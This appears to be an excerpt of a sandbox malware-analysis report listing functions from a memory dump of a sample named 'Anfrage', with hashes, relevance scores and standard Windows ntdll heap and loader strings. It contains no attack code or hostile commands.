                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                          • API String ID: 0-122214566
                                                                          • Opcode ID: 307706496cad567b194971fc2ee44ddbdb5c411783f94e27acf6568796a61a17
                                                                          • Instruction ID: 7949392294ffbaf2b9acc28afea232425b3f3933bb4ac996a406826e0fd69ddc
                                                                          • Opcode Fuzzy Hash: 307706496cad567b194971fc2ee44ddbdb5c411783f94e27acf6568796a61a17
                                                                          • Instruction Fuzzy Hash: 07C117B7E003159FEB158F65CC80BBE7BB9BF45348F644169E802AB280EB74C948D791
                                                                          Function 363D0770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-4253913091
                                                                          • Opcode ID: 2f58b152ff003c30d3a0dc27bca11a3841b47d61760f9e5e3dfb3faa6f6762b5
                                                                          • Instruction ID: 970d1cf38e4f0b0cbbec04149ed3e53573059a7e59ab780621f3bdba830d4cbc
                                                                          • Opcode Fuzzy Hash: 2f58b152ff003c30d3a0dc27bca11a3841b47d61760f9e5e3dfb3faa6f6762b5
                                                                          • Instruction Fuzzy Hash: B2F1CC75E00605EFEB09CF69C890BAAB7B5FF45B04F208168E4559B391DB30E981CFA1
                                                                          Function 363EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 3643031E
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 364302BD
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 364302E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: 86026a33f8b84519564536e39e16fdced0142463149d46300b8381c073b29080
                                                                          • Instruction ID: 37094e2356c9f73b40b0fb85251f60982ffc9acf660dba4607e0ccbabd50b666
                                                                          • Opcode Fuzzy Hash: 86026a33f8b84519564536e39e16fdced0142463149d46300b8381c073b29080
                                                                          • Instruction Fuzzy Hash: 60E1D175A047519FE711CF28C880B5AB7E4BF88798F200A2DF5A48B3D0DBB4D855CB92
                                                                          Function 3649B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 9e5d790435b7f13b18652f75fd3d267c0499e0adfb84b5b8cecc2f7bae454383
                                                                          • Instruction ID: 57c7b6f5bcf673c3bd6cd1ded0ddd7f7a77b4a7cbb7defb2ea11d0457a74ba2c
                                                                          • Opcode Fuzzy Hash: 9e5d790435b7f13b18652f75fd3d267c0499e0adfb84b5b8cecc2f7bae454383
                                                                          • Instruction Fuzzy Hash: E9F11776E406218FDB09CF69C9946BEBFF6EF88210759416DD456DB380E634EA01CB90
                                                                          Function 364711A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: This is located in the %s field of the heap header.$ -;6`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                          • API String ID: 0-966347974
                                                                          • Opcode ID: 43f84b54dac8d9b47bd15eefe8b1cac6b5b5750732f83dbd578cd04942d30a41
                                                                          • Instruction ID: 09523172735adf160c62a21c3ddd85f77fc670eb0932fbd1b51c43c248afb541
                                                                          • Opcode Fuzzy Hash: 43f84b54dac8d9b47bd15eefe8b1cac6b5b5750732f83dbd578cd04942d30a41
                                                                          • Instruction Fuzzy Hash: 7131FE35910210EFEB02CFA9CC84FD67BE9EF06B64F280055E451EB690DB34E844CEA5
                                                                          Function 363B76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                          • API String ID: 0-3061284088
                                                                          • Opcode ID: 197c56eeaeba84b2962cc7b0a0d2a07b92015b71319019548944daeda689ffa7
                                                                          • Instruction ID: 7aacff0c9c9e34431b45c5ae1740f5ac8bd16ba4eb51cf4d498b48016fe77e2e
                                                                          • Opcode Fuzzy Hash: 197c56eeaeba84b2962cc7b0a0d2a07b92015b71319019548944daeda689ffa7
                                                                          • Instruction Fuzzy Hash: 4701D436814290DFF3169F2AE949FA27FF4DB42730F244099E05147AA1CFB89885CA61
                                                                          Function 363D70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                          • API String ID: 0-3178619729
                                                                          • Opcode ID: ac9295dd62ede6878051829494ef93bdf5ffaf2114ef0a1383ed6dfdd6d577db
                                                                          • Instruction ID: 8e5f110550e119a2eb6dbbf07171d26c9d7e35377797044ba541ec3a40ee53f5
                                                                          • Opcode Fuzzy Hash: ac9295dd62ede6878051829494ef93bdf5ffaf2114ef0a1383ed6dfdd6d577db
                                                                          • Instruction Fuzzy Hash: AA139CB6E00355DFEB15CF69C8907A9BBB1FF48304F1481A9D849AB391D734A94ACF90
                                                                          Function 363CBEC0 Relevance: 5.7, Strings: 4, Instructions: 694COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$.mui$.mun$SystemResources\
                                                                          • API String ID: 0-3047833772
                                                                          • Opcode ID: 1851cdb720ffe553a75301b7f7a9c278dbc64ea71cb5e4af202404628e04e49d
                                                                          • Instruction ID: 6b927ce803c66f2d060ef852af24e5b3d762353e1ed96f44e58ee47c9ed236d0
                                                                          • Opcode Fuzzy Hash: 1851cdb720ffe553a75301b7f7a9c278dbc64ea71cb5e4af202404628e04e49d
                                                                          • Instruction Fuzzy Hash: 93622976E003298EDB21CF55CC80BD9B7B8BF0A754F4441EAE409A7A50DB359E85CF92
                                                                          Function 363CB6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\U96
                                                                          • API String ID: 0-342388985
                                                                          • Opcode ID: 5de80730bc938d9dc7d4dabe4e46e906e8da9a3ca70fe221f2b0c6759d555b77
                                                                          • Instruction ID: 6bf54cc65bf872368c6a97ce4edf92ab0fded0985b4c8006cfff20cfc1a74a2a
                                                                          • Opcode Fuzzy Hash: 5de80730bc938d9dc7d4dabe4e46e906e8da9a3ca70fe221f2b0c6759d555b77
                                                                          • Instruction Fuzzy Hash: E4B19A79E547558FEB16CF6AC980B9DB7F6AF44394F248429E852EB380E730E840CB50
                                                                          Function 363CB440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\U96${
                                                                          • API String ID: 0-2340779753
                                                                          • Opcode ID: 0f5445adbe007e66e7ddda1b3adae9050ce3b2075f5455c625c80ac85137a852
                                                                          • Instruction ID: 5de96b18d93b7161e5533afb76941d73790f358a77acf42d5ff4a2db2c73df73
                                                                          • Opcode Fuzzy Hash: 0f5445adbe007e66e7ddda1b3adae9050ce3b2075f5455c625c80ac85137a852
                                                                          • Instruction Fuzzy Hash: 8391CEB5E85759CFEB12CF55C840BAE77B4EF41364F208195E802AB390D7789E84CB91
                                                                          Function 363BF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                          • API String ID: 0-2586055223
                                                                          • Opcode ID: 492586fbf0ac5f1b24439fbb962b1f4ddf8e87c95e3f867df20d508ea79f8cf0
                                                                          • Instruction ID: 52c96326b36c21ec1ff07eb53aba774ab4cf02cb0fafe549b7c72571ed199806
                                                                          • Opcode Fuzzy Hash: 492586fbf0ac5f1b24439fbb962b1f4ddf8e87c95e3f867df20d508ea79f8cf0
                                                                          • Instruction Fuzzy Hash: 4361FF7AA04380AFE712CF64CC85F67B7E8EF80754F140468E9948B691DB34E945CBA2
                                                                          Function 363B9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                          • API String ID: 0-1391187441
                                                                          • Opcode ID: 55278e555f0c01495aad4a23b29533236adbf0fd97f94248ae390961ba575c28
                                                                          • Instruction ID: 830f9701c7032e1b14442730307d507e7669bc0611030c28a370e4ad6d0eb4c2
                                                                          • Opcode Fuzzy Hash: 55278e555f0c01495aad4a23b29533236adbf0fd97f94248ae390961ba575c28
                                                                          • Instruction Fuzzy Hash: 9E31BE36A00214EFEB01CF56CC84F9ABBF8EF457A0F1440A5E814AB690DB34E980CE61
                                                                          Function 36401270 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$BuildLabEx$E?6$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                          • API String ID: 0-2866721543
                                                                          • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                          • Instruction ID: 1d2a33563d61b5f80a62b64b0a154f1256839adaf9e1d50ec2a24de280610fc0
                                                                          • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                          • Instruction Fuzzy Hash: 85317E72D00628AFEB119FA5CD44EDEBFB9EB88750F104035E914A76A0E730DA05CFA5
                                                                          Function 363C7152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 4201e3ffd0b941c0ff18c55633a8348b25a6e6697681b81aaec20c866641b700
                                                                          • Instruction ID: fd43ef7d201a11bbdd46fae796439debbff048d243c68293402421281d136545
                                                                          • Opcode Fuzzy Hash: 4201e3ffd0b941c0ff18c55633a8348b25a6e6697681b81aaec20c866641b700
                                                                          • Instruction Fuzzy Hash: 0C51EDB5E10615EFFB05DF68C898BADBBB9BF84355F204069E90193290DB709905CB81
                                                                          Function 36493E10 Relevance: 4.6, APIs: 3, Instructions: 148timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 0fe1fc45694aae947b57daf38126dbeffe33aaf974456d41878f09eb305769f3
                                                                          • Instruction ID: 9f886b3ce1d7d2821bc371007a5b3bb98c33e58afb57a86fe5c8e0dc5db6dde7
                                                                          • Opcode Fuzzy Hash: 0fe1fc45694aae947b57daf38126dbeffe33aaf974456d41878f09eb305769f3
                                                                          • Instruction Fuzzy Hash: 21517875E40A16AFEB06CF64CC84B9ABBB6FF4A314F144065E90597790EB30AD21CB90
                                                                          Function 36467F3E Relevance: 4.6, APIs: 3, Instructions: 85timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 03a152981a6365d59fef779dabfadc186f70ad18636ced90e1741dc0f93e6924
                                                                          • Instruction ID: cfaf87f9e1b609859da759a2553cfbaec1398d9ce9d0ce93764c7b96492c4a32
                                                                          • Opcode Fuzzy Hash: 03a152981a6365d59fef779dabfadc186f70ad18636ced90e1741dc0f93e6924
                                                                          • Instruction Fuzzy Hash: D031F2B5E0021A8FDB04CFAAC988ADDFBB6BF49354F15812AE851B3250DB349941CF60
                                                                          Function 363D1F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                          • API String ID: 0-3178619729
                                                                          • Opcode ID: 843afc4af2f0a5d988972c3608654cc5d2a8e3276434bb8ef2e8cf36b70d66c9
                                                                          • Instruction ID: d5c9a7ea25bc30b59df4b20fd8f797241817dddb396624bff08857ddd4b29cdb
                                                                          • Opcode Fuzzy Hash: 843afc4af2f0a5d988972c3608654cc5d2a8e3276434bb8ef2e8cf36b70d66c9
                                                                          • Instruction Fuzzy Hash: 6F220FB4E003459FEB06CF25C890B6ABBF5FF05744F248499E9858B781DB35E886CB91
                                                                          Function 363C1460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • HEAP: , xrefs: 363C1596
                                                                          • HEAP[%wZ]: , xrefs: 363C1712
                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 363C1728
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                          • API String ID: 0-3178619729
                                                                          • Opcode ID: 37b792013ed53cccbef8913b22547ecf8438a724b4c31bc62c204efce1a9d011
                                                                          • Instruction ID: 3c3eefd5a64023855dd2c34fc1081764c9561aad5ce5f7e5b98c41fbafc35ba5
                                                                          • Opcode Fuzzy Hash: 37b792013ed53cccbef8913b22547ecf8438a724b4c31bc62c204efce1a9d011
                                                                          • Instruction Fuzzy Hash: EEE12074E047559FEB15CF28C890BBABBF5AF48304F14845EF8968B246DB34E845EB90
                                                                          Function 3644368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                          • API String ID: 0-2391371766
                                                                          • Opcode ID: 14661ea4d236dc23a44084c9958f30610a9b496c9f38f47c056ca84802c8abb9
                                                                          • Instruction ID: 1402a22d90d0f2552965c854607b15dc7710b524493af6e8353f46678726b077
                                                                          • Opcode Fuzzy Hash: 14661ea4d236dc23a44084c9958f30610a9b496c9f38f47c056ca84802c8abb9
                                                                          • Instruction Fuzzy Hash: 83B19F71E44351AFF713EF56CC81B57B7E8AB45B54F804829FA80A7280E775E804CB92
                                                                          Function 364536EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                          • API String ID: 0-318774311
                                                                          • Opcode ID: 7aa0fd78e77ab49760deba0274e6ba814012226d7ed10faa71ad483f1610eedf
                                                                          • Instruction ID: 635464f76f79cd1dbaa79eef4c19b27f39e55286e53c21f071c2c3d18c5dfcfc
                                                                          • Opcode Fuzzy Hash: 7aa0fd78e77ab49760deba0274e6ba814012226d7ed10faa71ad483f1610eedf
                                                                          • Instruction Fuzzy Hash: 70815AB5E08350AFE3129F15C880B6AB7E8EF85754F41496DFA9097390FB74D904CBA2
                                                                          Function 36447410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
                                                                          • Associated: 00000007.00000002.2511246780.00000000364B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.00000000364BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_36390000_Anfrage.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                          • API String ID: 0-3870751728
                                                                          • Opcode ID: ee54c18ce96e7d72d54074a32c5ab2d992e6eea949db1b9e1fcd608cc040c842
                                                                          • Instruction ID: 88a566965a349874d542bb18e808c735cbece7611089f989b81dd5ac28ec4144
                                                                          • Opcode Fuzzy Hash: ee54c18ce96e7d72d54074a32c5ab2d992e6eea949db1b9e1fcd608cc040c842
                                                                          • Instruction Fuzzy Hash: C79159B4E002159FEB15DF69C985BADBBF1BF48314F24C16AD904AB391EB359802CF94
                                                                          Function 363F909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Offset: 36390000, based on PE: true
